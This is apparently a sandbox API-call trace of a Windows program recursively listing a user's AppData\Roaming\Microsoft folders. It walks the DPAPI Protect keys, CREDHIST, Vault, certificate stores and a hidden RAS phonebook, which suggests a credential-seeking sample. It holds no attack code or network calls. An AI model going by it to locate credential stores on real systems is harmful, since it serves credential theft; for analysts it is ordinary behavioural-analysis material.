1 [0056.659] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0056.659] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0056.659] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.660] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.660] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.660] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0056.660] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0056.660] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0056.661] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.661] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.661] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0056.706] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.706] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.706] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.706] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.706] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.706] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC" [0056.706] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*" [0056.706] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07458 [0056.708] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.708] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.708] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0056.708] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.708] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network" [0056.708] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*" [0056.708] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0056.709] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.709] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.709] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0056.709] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0056.709] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07458 [0056.710] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.710] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.710] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0056.710] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0056.710] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb071d8 [0056.710] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.710] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.710] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0056.711] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0056.711] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.711] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.711] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.711] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0056.711] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.711] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.712] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.712] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.712] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.712] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0056.713] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.713] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.713] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.714] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect" [0056.714] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*" [0056.714] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0056.714] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.714] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.714] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0056.714] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.714] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000" [0056.714] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0056.714] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07158 [0056.715] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.715] PathMatchSpecW (pszFile="0e76ac85-01bf-412c-91a2-cef2eedde61a", pszSpec="*") returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.715] PathMatchSpecW (pszFile="1c8a6982-c4e6-4629-889a-0618a9675336", pszSpec="*") returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.715] PathMatchSpecW (pszFile="1cb7f609-08bd-4986-8a90-4f6e24f5d8cc", pszSpec="*") returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.715] PathMatchSpecW (pszFile="491bb34f-16c1-4bee-9f8c-432483187207", pszSpec="*") returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.715] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.715] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.715] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0056.715] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.716] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.716] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.716] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0056.716] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0056.716] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0056.716] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.716] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.716] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0056.716] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0056.716] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.717] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.717] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.717] PathMatchSpecW (pszFile="AppContainerUserCertRead", pszSpec="*") returned 1 [0056.717] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.717] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0056.717] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0056.717] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0056.717] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.717] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.717] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.718] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.718] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0056.718] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0056.718] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0056.718] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.718] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.718] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.718] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.718] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0056.718] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0056.719] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07498 [0056.719] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.719] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.719] FindClose (in: hFindFile=0xb07498 | out: hFindFile=0xb07498) returned 1 [0056.719] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.719] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.719] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.719] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.719] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.720] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Vault" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault" [0056.720] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*" [0056.720] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07558 [0056.720] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.720] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.720] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0056.720] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.720] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows" [0056.720] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*" [0056.720] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0056.721] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.721] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.721] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="AccountPictures" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures" [0056.721] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*" [0056.721] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\AccountPictures\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.721] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.721] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.721] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.721] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.721] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 